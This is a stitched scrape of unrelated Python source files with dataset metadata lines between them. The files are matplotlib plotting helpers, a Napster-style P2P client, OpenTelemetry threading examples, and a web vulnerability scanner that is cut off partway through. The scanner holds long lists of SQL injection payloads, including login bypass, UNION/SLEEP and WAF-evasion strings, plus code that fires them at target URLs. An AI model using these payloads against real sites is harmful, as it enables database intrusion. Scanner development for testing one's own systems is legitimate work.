yaxis.set_label_position('right')
# ======================= level 1: advanced ax edits ========================
def cox(ax, x, xtlabels):
"""Add co-xticklabels at top of the plot, e.g., with a different unit
Args:
ax (plt.Axes): matplotlib axes
x (list): xtick locations
xtlabels (list): xtick labels
"""
ax1 = ax.twiny()
ax1.set_xlim(ax.get_xlim())
ax.set_xticks(x)
ax1.set_xticks(x)
ax1.set_xticklabels(xtlabels)
xtop(ax1)
return ax1
def coy(ax, y, ytlabels):
"""Add co-yticklabels on the right of the plot, e.g., with a different unit
Args:
ax (plt.Axes): matplotlib axes
y (list): ytick locations
ytlabels (list): ytick labels
"""
ax1 = ax.twinx()
ax1.set_ylim(ax.get_ylim())
ax.set_yticks(y)
ax1.set_yticks(y)
ax1.set_yticklabels(ytlabels)
yright(ax1)
return ax1
def align_ylim(ax1, ax2):
ylim1 = ax1.get_ylim()
ylim2 = ax2.get_ylim()
ymin = min(ylim1[0], ylim2[0])
ymax = max(ylim1[1], ylim2[1])
ylim = (ymin, ymax)
ax1.set_ylim(ylim)
ax2.set_ylim(ylim)
# ====================== level 0: basic legend edits =======================
def set_legend_marker_size(leg, ms=10):
handl = leg.legendHandles
msl = [ms]*len(handl) # override marker sizes here
for hand, ms in zip(handl, msl):
hand._legmarker.set_markersize(ms)
def create_legend(ax, styles, labels, **kwargs):
""" create custom legend
learned from "Composing Custom Legends"
Args:
ax (plt.Axes): matplotlib axes
Return:
plt.legend.Legend: legend artist
"""
from matplotlib.lines import Line2D
custom_lines = [Line2D([], [], **style) for style in styles]
leg = ax.legend(custom_lines, labels, **kwargs)
return leg
# ====================== level 0: global edits =======================
def set_style(style='ticks', context='talk', **kwargs):
import seaborn as sns
if (context=='talk') and ('font_scale' not in kwargs):
kwargs['font_scale'] = 0.7
sns.set_style(style)
sns.set_context(context, **kwargs)
# ====================== level 0: basic Line2D edits =======================
def get_style(line):
""" get plot styles from Line2D object
mostly copied from "Line2D.update_from"
Args:
line (Line2D): source of style
Return:
dict: line styles readily usable for another plot
"""
styles = {
'linestyle': line.get_linestyle(),
'linewidth': line.get_linewidth(),
'color': line.get_color(),
'markersize': line.get_markersize(),
'linestyle': line.get_linestyle(),
'marker': line.get_marker()
}
return styles
# ====================== level 0: basic Line2D =======================
def errorshade(ax, x, ym, ye, **kwargs):
line = ax.plot(x, ym, **kwargs)
alpha = 0.4
myc = line[0].get_color()
eline = ax.fill_between(x, ym-ye, ym+ye, color=myc, alpha=alpha)
return line, eline
# ===================== level 1: fit line ======================
def show_fit(ax, line, model, sel=None, nx=64, popt=None,
xmin=None, xmax=None, circle=True, circle_style=None,
cross=False, cross_style=None, **kwargs):
""" fit a segment of (x, y) data and show fit
get x, y data from line; use sel to make selection
Args:
ax (Axes): matplotlib axes
line (Line2D): line with data
model (callable): model function
sel (np.array, optional): boolean selector array
nx (int, optional): grid size, default 64
xmin (float, optional): grid min
xmax (float, optional): grid max
circle (bool, optional): circle selected points, default True
cross (bool, optional): cross out deselected points, default False
Return:
(np.array, np.array, list): (popt, perr, lines)
"""
import numpy as np
from scipy.optimize import curve_fit
# get and select data to fit
myx = line.get_xdata()
myy = line.get_ydata()
# show selected data
if sel is None:
sel = np.ones(len(myx), dtype=bool)
myx1 = myx[sel]
myy1 = myy[sel]
myx11 = myx[~sel]
myy11 = myy[~sel]
if xmin is None:
xmin = myx1.min()
if xmax is None:
xmax = myx1.max()
lines = []
if circle:
styles = get_style(line)
styles['linestyle'] = ''
styles['marker'] = 'o'
styles['fillstyle'] = 'none'
if circle_style is not None:
styles.update(circle_style)
line1 = ax.plot(myx[sel], myy[sel], **styles)
lines.append(line1[0])
if cross:
styles = get_style(line)
styles['linestyle'] = ''
styles['marker'] = 'x'
if cross_style is not None:
styles.update(cross_style)
line11 = ax.plot(myx11, myy11, **styles)
lines.append(line11[0])
if popt is None: # perform fit
popt, pcov = curve_fit(model, myx1, myy1)
perr = np.sqrt(np.diag(pcov))
else:
perr = None
# show fit
finex = np.linspace(xmin, xmax, nx)
line2 = ax.plot(finex, model(finex, *popt),
c=line.get_color(), **kwargs)
lines.append(line2[0])
return popt, perr, lines
def smooth_bspline(myx, myy, nxmult=10, **spl_kws):
import numpy as np
from scipy.interpolate import splrep, splev
nx = len(myx)*nxmult
idx = np.argsort(myx)
tck = splrep(myx[idx], myy[idx], **spl_kws)
finex = np.linspace(myx.min(), myx.max(), nx)
finey = splev(finex, tck)
return finex, finey
def show_spline(ax, line, spl_kws=dict(), sel=None, **kwargs):
""" show a smooth spline through given line x y
Args:
ax (plt.Axes): matplotlib axes
line (Line1D): matplotlib line object
spl_kws (dict, optional): keyword arguments to splrep, default is empty
nx (int, optional): number of points to allocate to 1D grid
Return:
Line1D: interpolating line
"""
import numpy as np
myx = line.get_xdata()
myy = line.get_ydata()
if sel is None:
sel = np.ones(len(myx), dtype=bool)
myx = myx[sel]
myy = myy[sel]
finex, finey = smooth_bspline(myx, myy, **spl_kws)
color = line.get_color()
line1 = ax.plot(finex, finey, c=color, **kwargs)
return line1
def krig(finex, x0, y0, length_scale, noise_level):
from sklearn.gaussian_process.gpr import GaussianProcessRegressor
from sklearn.gaussian_process.kernels import DotProduct, RBF
from sklearn.gaussian_process.kernels import WhiteKernel
kernel = DotProduct() + RBF(length_scale=length_scale)
kernel += WhiteKernel(noise_level=noise_level)
gpr = GaussianProcessRegressor(kernel=kernel)
gpr.fit(x0[:, None], y0)
ym, ye = gpr.predict(finex[:, None], return_std=True)
return ym, ye
def gpr_errorshade(ax, x, ym, ye,
length_scale, noise_level, fb_kwargs=None,
**kwargs):
"""WARNING: length_scale and noise_level are VERY DIFFICULT to tune """
# make errorbar plot and extract color
if ('ls' not in kwargs) and ('linestyle' not in kwargs):
kwargs['ls'] = ''
line = ax.errorbar(x, ym, ye, **kwargs)
myc = line[0].get_color()
# smoothly fit data
import numpy as np
dx = abs(x[1]-x[0])
xmin = x.min(); xmax = x.max()
finex = np.arange(xmin, xmax, dx/10.)
ylm, yle = krig(finex, x, ym-ye,
length_scale=length_scale, noise_level=noise_level)
yhm, yhe = krig(finex, x, ym+ye,
length_scale=length_scale, noise_level=noise_level)
# plot fit
if fb_kwargs is None:
fb_kwargs = {'color': myc, 'alpha': 0.4}
eline = ax.fill_between(finex, ylm-yle, yhm+yhe, **fb_kwargs)
return line[0], eline
# ===================== level 2: insets ======================
def inset_zoom(fig, ax_box, xlim, ylim, draw_func, xy_label=False):
""" show an inset that zooms into a given part of the figure
Args:
fig (plt.Figure): figure
ax_box (tuple): inset location and size (x0, y0, dx, dy) in figure ratio
xlim (tuple): (xmin, xmax)
ylim (tuple): (ymin, ymax)
draw_func (callable): draw_func(ax) should recreate the figure
xy_label (bool, optional): label inset axes, default is False
Return:
plt.Axes: inset axes
Example:
>>> ax1 = inset_zoom(fig, [0.15, 0.15, 0.3, 0.3], [0.1, 0.5], [-0.02, 0.01],
>>> lambda ax: ax.plot(x, y))
>>> ax.indicate_inset_zoom(axins)
"""
ax1 = fig.add_axes(ax_box)
ax1.set_xlim(*xlim)
ax1.set_ylim(*ylim)
draw_func(ax1)
if not xy_label:
ax1.set_xticks([])
ax1.set_yticks([])
return ax1
# ======================== composition =========================
def pretty_up(ax):
set_tick_font(ax)
set_label_font(ax)
| 2.40625 | 2 |
src/client/client.py | martingaston/bangbangnapster | 2 | 12769719 | <gh_stars>1-10
import socket
import socketserver
import struct
from src.client.name_generator import generate_username
from src.packet import Packet, read_packet
from src.packet_type import PacketType
from src.client.search_result import SearchResult
from pathlib import Path
from typing import Optional
import threading
from functools import partial
from hashlib import md5
# HOST, PORT = "ec2-52-56-46-175.eu-west-2.compute.amazonaws.com", 5000
class PeerServerHandler(socketserver.BaseRequestHandler):
def handle(self):
self.request: socket.socket
self.request.sendall(b"1")
filename = self.request.recv(1024).decode("ascii")
path = Path("shared").joinpath(filename)
if path.exists():
with open(path, "rb") as f:
for chunk in iter(partial(f.read, 1024), b""):
self.request.sendall(chunk)
class PeerTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
def peer_server(port=6699):
server = PeerTCPServer(("", port), PeerServerHandler)
with server:
IP, PORT = server.server_address
print(f"🤝 Peer server active on {IP}:{PORT}")
server.serve_forever()
class Client:
host: str
port: int
def __init__(self, host: str = "localhost", port: int = 5000):
self.host = host
self.port = port
def start(self):
x = threading.Thread(target=peer_server, daemon=True)
x.start()
# Create a socket (SOCK_STREAM means a TCP socket)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
self.sock = sock
sock.connect((self.host, self.port))
motd = Path.cwd().joinpath("src", "client", "motd").read_text()
print(motd)
# login
self._login()
self._share_all_files()
self._main_menu()
def _login(self):
data = f'{generate_username()} nopass 6699 "bangbangnapster 0.1" 3'
packet = Packet(PacketType.REGISTERED_LOGIN_REQUEST, data)
self.sock.sendall(bytes(packet))
logged_in = read_packet(self.sock)
if logged_in.packet_type != PacketType.LOGIN_ACKNOWLEDGE:
print("failed to login, exiting")
exit(1)
def _logout(self):
unshare_all = b"\x00\x00\x6E\x00"
self.sock.sendall(unshare_all)
exit(0)
def _share_all_files(self):
library = Path.cwd().joinpath("shared").glob("*.mp3")
for mp3 in library:
mp3_bytes = mp3.read_bytes()
hash = md5(mp3_bytes).hexdigest()
packet = Packet(
PacketType.ADD_A_FILE_TO_SHARED_FILE_INDEX,
f'"{mp3.name}" {hash} {len(mp3_bytes)} 128 44100 60',
)
self.sock.sendall(bytes(packet))
def _main_menu(self):
print("Select an option:")
print("1. Search for a file")
print("2. Log out")
selection = input(">>> ")
if selection == "1":
self._search_for_files()
elif selection == "2":
self._logout()
def _search_for_files(self):
print("What shall we search for?")
selection = input(">>> ")
search_request = (
struct.pack("<H", len(selection))
+ b"\xC8\x00"
+ bytes(selection, encoding="ascii")
)
self.sock.sendall(search_request)
self._get_search_results()
def _get_search_results(self):
results = []
while True:
packet = read_packet(self.sock)
if packet.packet_type is PacketType.SEARCH_QUERY_RESULTS:
results.append(SearchResult.from_bytes(packet.data))
elif packet.packet_type is PacketType.SEARCH_QUERY_RESULTS_END_NOTIFICATION:
break
else:
print("Server returned unexpected response. Whoops! Exiting.")
self._logout()
self._show_download_options(results)
def _show_download_options(self, results):
MAX_RESULTS = 5
print("results:")
for index, result in enumerate(results[:MAX_RESULTS]):
print(f"{index}. {result}")
print("5. Return to main menu")
print("would you like to download any of these files?")
res = input(">>> ")
if res == "0" or res == "1" or res == "2" or res == "3" or res == "4":
self._download(results[int(res)])
if res == "5":
self._main_menu()
def _download(self, result: SearchResult):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
sock.connect((str(result.ip), 6699))
ack = sock.recv(1)
if ack.decode("ascii") == "1":
print(
f"☎️ connected to {result.ip}, attempting to download {result.filename}"
)
sock.send(bytes(result.filename.encode("ascii")))
with open(f"shared/{result.filename}", "wb") as f:
while True:
received = sock.recv(1024)
if received == b"":
break
f.write(received)
print(
f"🎉 download of {result.filename} from {result.nick} ({result.size} bytes) complete"
)
self._main_menu()
def _handle_packet(self, packet: Packet) -> Optional[Packet]:
if packet.packet_type == PacketType.SEARCH_QUERY_RESULTS:
print(packet)
return None
if packet.packet_type == PacketType.SEARCH_QUERY_RESULTS_END_NOTIFICATION:
print("end of search results")
return None
return None
| 2.953125 | 3 |
examples/wipac_tracing/span_multithreaded_multiproccessed.py | WIPACrepo/wipac-telemetry-prototype | 0 | 12769720 | <reponame>WIPACrepo/wipac-telemetry-prototype
"""Examples for spanned() decorator with multi-threaded/processed tracing."""
# pylint: disable=protected-access
import logging
import os
import sys
import time
from concurrent.futures import (
Future,
ProcessPoolExecutor,
ThreadPoolExecutor,
as_completed,
)
from typing import Any, Dict, List
import coloredlogs # type: ignore[import]
if "examples" not in os.listdir():
raise RuntimeError("Script needs to be ran from root of repository.")
sys.path.append(".")
import wipac_telemetry.tracing_tools as wtt # noqa: E402 # pylint: disable=C0413,E0401
########################################################################################
@wtt.spanned()
def example_00_threads_incorrect(n_threads: int) -> None:
"""Run multiple independent threads, INCORRECTLY.
Spanning an in-thread function will not inherit ANYTHING. The
resulting span is completely not related in any way to the
*intended* parent.
Don't do this!
"""
outter_span = wtt.get_current_span()
@wtt.spanned(all_args=True)
def thread_work(worker: int) -> int:
"""Do thread's work."""
assert outter_span.is_recording() # surprising? this is b/c of shared memory
assert wtt.get_current_span().is_recording() # as expected
assert outter_span != wtt.get_current_span() # good
assert not wtt.get_current_span()._parent # NOT GOOD!
# # # #
time.sleep(1)
return worker
futures: List[Future] = [] # type: ignore[type-arg]
with ThreadPoolExecutor() as pool:
for i in range(n_threads):
futures.append(pool.submit(thread_work, i))
for worker in as_completed(futures):
ret = worker.result()
print(f"Returned Worker #{ret}")
@wtt.spanned()
def example_01_threads_incorrect(n_threads: int) -> None:
"""Run multiple independent threads, INCORRECTLY.
A non-spanned in-thread function won't be spanned by its *intended*
parent.
Don't do this!
"""
outter_span = wtt.get_current_span()
def thread_work(worker: int, carrier: Dict[str, Any]) -> int:
"""Do thread's work."""
assert outter_span.is_recording() # surprising? this is b/c of shared memory
assert not wtt.get_current_span().is_recording() # BAD!
assert outter_span != wtt.get_current_span() # good
# assert wtt.get_current_span()._parent # (n/a b/c not recording)
# # # #
print(carrier)
time.sleep(1)
# shared memory allows this -- but not a great idea logically...
outter_span.add_event("I'm", {"A": "Thread"})
return worker
futures: List[Future] = [] # type: ignore[type-arg]
with ThreadPoolExecutor() as pool:
for i in range(n_threads):
carrier = wtt.inject_span_carrier()
print(carrier)
futures.append(pool.submit(thread_work, i, carrier))
for worker in as_completed(futures):
ret = worker.result()
wtt.add_event("Worker Join", {"worker-id": ret, "type": "thread"})
print(f"Returned Worker #{ret}")
@wtt.spanned()
def example_02_threads_incorrect(n_threads: int) -> None:
"""Run multiple independent threads, INCORRECTLY.
A re-spanned in-thread function may work, but is NOT SAFE. There's a
race condition: a parent process/thread may end the span before the
child thread uses it, or visa-versa. It's not a good idea.
Don't do this!
"""
outter_span = wtt.get_current_span()
# even with `wtt.SpanBehavior.DONT_END`, this isn't a good idea
@wtt.respanned("span", wtt.SpanBehavior.END_ON_EXIT)
def thread_work(worker: int, span: wtt.Span) -> int:
"""Do thread's work."""
assert span == outter_span == wtt.get_current_span()
assert outter_span.is_recording() # sure
assert wtt.get_current_span().is_recording() # as expected
assert outter_span == wtt.get_current_span() # as expected
assert not wtt.get_current_span()._parent
# # # #
# print(carrier)
time.sleep(1)
# shared memory allows this -- but not a great idea logically...
outter_span.add_event("I'm", {"A": "Thread"})
return worker
futures: List[Future] = [] # type: ignore[type-arg]
with ThreadPoolExecutor() as pool:
for i in range(n_threads):
# carrier = wtt.inject_span_carrier()
# print(carrier)
futures.append(pool.submit(thread_work, i, outter_span))
for worker in as_completed(futures):
ret = worker.result()
wtt.add_event("Worker Join", {"worker-id": ret, "type": "thread"})
print(f"Returned Worker #{ret}")
########################################################################################
@wtt.spanned()
def example_10_threads(n_threads: int) -> None:
"""Run multiple independent threads, with a common carrier."""
outter_span = wtt.get_current_span()
@wtt.spanned(all_args=True, carrier="carrier")
def thread_work(worker: int, carrier: Dict[str, Any]) -> int:
"""Do thread's work."""
assert outter_span.is_recording() # surprising? this is b/c of shared memory
assert wtt.get_current_span().is_recording() # as expected
assert outter_span != wtt.get_current_span() # good
assert wtt.get_current_span()._parent # GREAT!
# # # #
print(carrier)
time.sleep(1)
return worker
futures: List[Future] = [] # type: ignore[type-arg]
with ThreadPoolExecutor() as pool:
for i in range(n_threads):
carrier = wtt.inject_span_carrier()
print(carrier)
futures.append(pool.submit(thread_work, i, carrier))
for worker in as_completed(futures):
ret = worker.result()
wtt.add_event("Worker Join", {"worker-id": ret, "type": "thread"})
print(f"Returned Worker #{ret}")
########################################################################################
@wtt.spanned(all_args=True, carrier="carrier")
def process_work(worker: int, carrier: Dict[str, Any]) -> int:
"""Do child process's work."""
print(carrier)
time.sleep(1)
return worker
@wtt.spanned()
def example_20_processes(n_threads: int) -> None:
"""Run multiple independent process, with a common carrier."""
futures: List[Future] = [] # type: ignore[type-arg]
with ProcessPoolExecutor() as pool:
for i in range(n_threads):
carrier = wtt.inject_span_carrier()
print(carrier)
futures.append(pool.submit(process_work, i, carrier))
for worker in as_completed(futures):
ret = worker.result()
wtt.add_event("Worker Join", {"worker-id": ret, "type": "process"})
print(f"Returned Worker #{ret}")
########################################################################################
if __name__ == "__main__":
coloredlogs.install(level="DEBUG")
# MULTI-THREADING
logging.warning("EXAMPLE #00 - Threaded Incorrectly")
example_00_threads_incorrect(3)
logging.warning("EXAMPLE #01 - Threaded Incorrectly")
example_01_threads_incorrect(3)
logging.warning("EXAMPLE #02 - Threaded Incorrectly")
example_02_threads_incorrect(3)
logging.warning("EXAMPLE #10 - Threaded with Carrier")
example_10_threads(3)
# MULTI-PROCESSING
logging.warning("EXAMPLE #20 - Processes with Carrier")
example_20_processes(3)
# At this point you may be wondering,
# "Well what happens if I use 'respanned' with multi-processing?"
# Bad things, bad things will happen: inconsistent sem-lock
# errors/timeouts, hanging processes, etc.
| 2.015625 | 2 |
knowledge_graph/crawler/text_crawler/text_crawler/spiders/xywy/__init__.py | Syhen/knowledge-graph | 2 | 12769721 | <reponame>Syhen/knowledge-graph
# -*- coding: utf-8 -*-
"""
Author: @heyao
Created On: 2019/6/24 下午1:57
"""
| 0.667969 | 1 |
wikimedia_thumbor/error_handlers/logstash/__init__.py | wikimedia/operations-software-thumbor-plugins | 2 | 12769722 | from .logstash import ErrorHandler
__all__ = ['ErrorHandler']
| 1.15625 | 1 |
strucpara/processing.py | alayah2626517/strucpara | 0 | 12769723 | <gh_stars>0
from os import path, system
from io import StringIO
import pandas as pd
from strucpara.miscell import check_dir_exist_and_make
ensemble_exec = '/home/yizaochen/opt/x3dna-v2.3/bin/x3dna_ensemble'
class BasePairAgent:
def __init__(self, rootfolder, host, time_interval):
self.rootfolder = rootfolder
self.type_na = 'bdna+bdna'
self.n_bp = 13
self.host = host
self.time_interval = time_interval
self.host_folder = path.join(rootfolder, host)
self.host_time_folder = path.join(self.host_folder, time_interval)
self.check_folder()
self.ensemble_out = path.join(self.host_time_folder, f'{self.type_na}.ensemble.out')
self.server_root = '/home/yizaochen/x3dna/paper_2021'
self.host_time_server = path.join(self.server_root, host, time_interval)
self.ensemble_out_server = path.join(self.host_time_server, f'{self.type_na}.ensemble.out')
self.parameters = ['shear', 'buckle', 'stretch', 'propeller', 'stagger', 'opening']
def check_folder(self):
for folder in [self.host_folder, self.host_time_folder]:
check_dir_exist_and_make(folder)
def download_ensesmble_out(self, serverip):
print('Please excute the following in the terminal:')
cmd = f'scp yizaochen@{serverip}:{self.ensemble_out_server} {self.ensemble_out}'
print(cmd)
def extract_parameters(self):
for parameter in self.parameters:
output_dat = path.join(self.host_time_folder, f'{parameter}.dat')
cmd = f'{ensemble_exec} extract -f {self.ensemble_out} -p {parameter} -o {output_dat}'
system(cmd)
print(cmd)
def convert_dat_to_csv(self):
for parameter in self.parameters:
dat_in = path.join(self.host_time_folder, f'{parameter}.out')
f = open(dat_in, 'r')
lines = f.readlines()
f.close()
first_line = self.get_first_line()
lines = first_line + lines
buffer = StringIO(''.join(lines))
df = pd.read_csv(buffer, sep="\t")
csv_out = path.join(self.host_time_folder, f'{parameter}.csv')
df.to_csv(csv_out, index=False)
print(f'Dataframe to csv: {csv_out}')
def get_first_line(self):
result = ['Frame-ID']
for bp_id in range(1, self.n_bp+1):
if bp_id == self.n_bp:
result.append(f'bp{bp_id}\n')
else:
result.append(f'bp{bp_id}')
return ['\t'.join(result)]
def clean_dat_files(self):
cmd = f'rm {self.host_time_folder}/*.dat'
print("Please execute the following on Terminal:")
print(cmd)
class BaseStepAgent(BasePairAgent):
def __init__(self, rootfolder, host, time_interval):
super().__init__(rootfolder, host, time_interval)
self.parameters = ['shift', 'tilt', 'slide', 'roll', 'rise', 'twist']
def get_first_line(self):
result = ['Frame-ID']
for bp_id in range(1, self.n_bp):
if bp_id == (self.n_bp-1):
result.append(f'bp{bp_id}_bp{bp_id+1}\n')
else:
result.append(f'bp{bp_id}_bp{bp_id+1}')
return ['\t'.join(result)]
class GrooveAgent(BasePairAgent):
def __init__(self, rootfolder, host, time_interval):
super().__init__(rootfolder, host, time_interval)
self.parameters = ['major_gw_pp', 'major_gw_refined', 'minor_gw_pp', 'minor_gw_refined']
def get_first_line(self):
result = ['Frame-ID']
for bp_id in range(1, self.n_bp):
if bp_id == (self.n_bp-1):
result.append(f'label{bp_id}\n')
else:
result.append(f'label{bp_id}')
return ['\t'.join(result)] | 2.421875 | 2 |
vul_module.py | KirieHaruna/web_scanner | 0 | 12769724 | <reponame>KirieHaruna/web_scanner
# coding:utf8
import mysql
import requests
import urllib.parse
from urllib.parse import quote as urlencode
from urllib.parse import unquote as urldecode
import hashlib
import sys
import re
import urllib.parse
import threading
import dbms as dbms
from config import *
import imp
import DOM
import random
imp.reload(sys)
# sys.setdefaultencoding( "utf-8" )
PROXY = {
"http": "http://127.0.0.1:1080"
}
HEADER = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'
}
COOKIE = {}
vul_file = open('vulfile.txt', 'w')
def md5_encrypt(str):
m = hashlib.md5(str.encode(encoding='utf-8'))
return m.hexdigest()
class vul_module(threading.Thread):
def __init__(self, url, logfile):
threading.Thread.__init__(self)
self.url = url
self.sql_errors = []
self.logfile = logfile
def Integer_sqlinj_scan(self):
try:
res_md5_1 = md5_encrypt(requests.get(url=self.url, headers=HEADER).text)
res_md5_2 = md5_encrypt(requests.get(url=self.url + urlencode('+1'), headers=HEADER).text)
res_md5_3 = md5_encrypt(requests.get(url=self.url + urlencode('+1-1'), headers=HEADER).text)
res_DOM_1 = DOM.check(self.url)
res_DOM_2 = DOM.check(self.url + urlencode('+1'))
res_DOM_3 = DOM.check(self.url + urlencode('+1-1'))
except Exception as e:
print(e)
res_md5_1 = res_md5_2 = res_md5_3 = 0
pass
if (res_DOM_1 == res_DOM_3 and res_DOM_1 != res_DOM_2) or ((res_md5_1 == res_md5_3) and res_md5_1 != res_md5_2):
return self.url
return 0
def Str_sqlinj_scan(self, waf):
quotes = ['\'', '"', '']
payload_0 = [" and 0;-- ",
"/**/and/**/0;#",
"\tand\t0;#",
"\nand/**/0;#",
"\'-\'",
"\' \'",
"\'&\'",
"\'^\'",
"\'*\'",
"\' or \'\'-\'",
"\' or \'\' \'",
"\' or \'\'&\'",
"\' or \'\'^\'",
"\' or \'\'*\'",
"\"-\"",
"\" \"",
"\"&\"",
"\"^\"",
"\"*\"",
"\" or \"\"-\"",
"\" or \"\" \"",
"\" or \"\"&\"",
"\" or \"\"^\"",
"\" or \"\"*\"",
"or true--",
"\" or true--",
"\' or true--",
"\") or true--",
"\') or true--",
"\' or \'x\'=\'x",
"\') or (\'x\')=(\'x",
"\')) or ((\'x\'))=((\'x",
"\" or \"x\"=\"x",
"\") or (\"x\")=(\"x",
"\")) or ((\"x\"))=((\"x",
"or 1=1",
"or 1=1--",
"or 1=1#",
"or 1=1/*",
"admin\' --",
"admin\' #",
"admin\'/*",
"admin\' or \'1\'=\'1",
"admin\' or \'1\'=\'1\'--",
"admin\' or \'1\'=\'1\'#",
"admin\' or \'1\'=\'1\'/*",
"admin\'or 1=1 or \'\'=\'",
"admin\' or 1=1",
"admin\' or 1=1--",
"admin\' or 1=1#",
"admin\' or 1=1/*",
"admin\') or (\'1\'=\'1",
"admin\') or (\'1\'=\'1\'--",
"admin\') or (\'1\'=\'1\'#",
"admin\') or (\'1\'=\'1\'/*",
"admin\') or \'1\'=\'1",
"admin\') or \'1\'=\'1\'--",
"admin\') or \'1\'=\'1\'#",
"admin\') or \'1\'=\'1\'/*",
"1234 \' AND 1=0 UNION ALL SELECT \'admin\', \'81dc9bdb52d04dc20036dbd8313ed055",
"admin\" --",
"admin\" #",
"admin\"/*",
"admin\" or \"1\"=\"1",
"admin\" or \"1\"=\"1\"--",
"admin\" or \"1\"=\"1\"#",
"admin\" or \"1\"=\"1\"/*",
"admin\"or 1=1 or \"\"=\"",
"admin\" or 1=1",
"admin\" or 1=1--",
"admin\" or 1=1#",
"admin\" or 1=1/*",
"admin\") or (\"1\"=\"1",
"admin\") or (\"1\"=\"1\"--",
"admin\") or (\"1\"=\"1\"#",
"admin\") or (\"1\"=\"1\"/*",
"admin\") or \"1\"=\"1",
"admin\") or \"1\"=\"1\"--",
"admin\") or \"1\"=\"1\"#",
"admin\") or \"1\"=\"1\"/*",
"1234 \" AND 1=0 UNION ALL SELECT \"admin\", \"81dc9bdb52d04dc20036dbd8313ed05\"",
" UNION ALL SELECT 1,2,3,4",
" UNION ALL SELECT 1,2,3,4,5-- ",
" UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5",
" UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL-- ",
" AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))-- ",
" UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5--",
" RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='",
]
payload_1 = [" and 1;-- ",
"/**/and/**/1;#",
"\tand\t1;#",
"\nand/**/1;#",
"\'-\'",
"\' \'",
"\'&\'",
"\'^\'",
"\'*\'",
"\' or \'\'-\'",
"\' or \'\' \'",
"\' or \'\'&\'",
"\' or \'\'^\'",
"\' or \'\'*\'",
"\"-\"",
"\" \"",
"\"&\"",
"\"^\"",
"\"*\"",
"\" or \"\"-\"",
"\" or \"\" \"",
"\" or \"\"&\"",
"\" or \"\"^\"",
"\" or \"\"*\"",
"or true--",
"\" or true--",
"\' or true--",
"\") or true--",
"\') or true--",
"\' or \'x\'=\'x",
"\') or (\'x\')=(\'x",
"\')) or ((\'x\'))=((\'x",
"\" or \"x\"=\"x",
"\") or (\"x\")=(\"x",
"\")) or ((\"x\"))=((\"x",
"or 1=1",
"or 1=1--",
"or 1=1#",
"or 1=1/*",
"admin\' --",
"admin\' #",
"admin\'/*",
"admin\' or \'1\'=\'1",
"admin\' or \'1\'=\'1\'--",
"admin\' or \'1\'=\'1\'#",
"admin\' or \'1\'=\'1\'/*",
"admin\'or 1=1 or \'\'=\'",
"admin\' or 1=1",
"admin\' or 1=1--",
"admin\' or 1=1#",
"admin\' or 1=1/*",
"admin\') or (\'1\'=\'1",
"admin\') or (\'1\'=\'1\'--",
"admin\') or (\'1\'=\'1\'#",
"admin\') or (\'1\'=\'1\'/*",
"admin\') or \'1\'=\'1",
"admin\') or \'1\'=\'1\'--",
"admin\') or \'1\'=\'1\'#",
"admin\') or \'1\'=\'1\'/*",
"1234 \' AND 1=0 UNION ALL SELECT \'admin\', \'81dc9bdb52d04dc20036dbd8313ed055",
"admin\" --",
"admin\" #",
"admin\"/*",
"admin\" or \"1\"=\"1",
"admin\" or \"1\"=\"1\"--",
"admin\" or \"1\"=\"1\"#",
"admin\" or \"1\"=\"1\"/*",
"admin\"or 1=1 or \"\"=\"",
"admin\" or 1=1",
"admin\" or 1=1--",
"admin\" or 1=1#",
"admin\" or 1=1/*",
"admin\") or (\"1\"=\"1",
"admin\") or (\"1\"=\"1\"--",
"admin\") or (\"1\"=\"1\"#",
"admin\") or (\"1\"=\"1\"/*",
"admin\") or \"1\"=\"1",
"admin\") or \"1\"=\"1\"--",
"admin\") or \"1\"=\"1\"#",
"admin\") or \"1\"=\"1\"/*",
"1234 \" AND 1=0 UNION ALL SELECT \""
" UNION ALL SELECT 1,2,3,4",
" UNION ALL SELECT 1,2,3,4,5-- ",
" UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5",
" UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL-- ",
" AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))-- ",
" UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5--",
" RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='",
]
payload_3 = [" And 0;-- ",
"/**/And/**/0;#",
"\tAnd\t0;#",
"\nAnd/**/0;#",
" Union All Select 1,2,3,4",
" Union All Select 1,2,3,4,5-- ",
" Union All Select @@version,sleep(5),user(),benchmark(1000000,md5('A')),5",
" Union All Select @@version,user(),sleep(5),benchmark(1000000,md5('A')),null,null,null-- ",
" And 5650=CONVERT(int,(Union all selectchar(88)+char(88)+char(88)))-- ",
" Union All Select 'inj'||'ect'||'xxx',2,3,4,5--",
" Rlike (Select (case when (4346=4346) then 0x61646d696e else 0x28 end)) and 'Txws'='",
" And%200;--",
" Union%20All%20Select%201,2,3,4",
" Union%20All%20Select%201,2,3,4,5--",
" Union%20All%20Select%20@@version,sleep(5),user(),benchmark(1000000,md5(%27A%27)),5",
" Union%20All%20Select%20@@version,user(),sleep(5),benchmark(1000000,md5(%27A%27)),null,null,null--",
" And%205650=CONVERT(int,(Union%20all%20selectchar(88)+char(88)+char(88)))--",
" Union%20All%20Select%20%27inj%27||%27ect%27||%27xxx%27,2,3,4,5--",
" Rlike%20(Select%20(case%20when%20(4346=4346)%20then%200x61646d696e%20else%200x28%20end))%20and%20%27Txws%27=%27",
" chr(97)+chr(110)+chr(100) 0;-- ",
" aandNandd 0;-- ",
]
payload_4 = [" And 0;-- ",
"/**/And/**/0;#",
"\tAnd\t0;#",
"\nAnd/**/0;#",
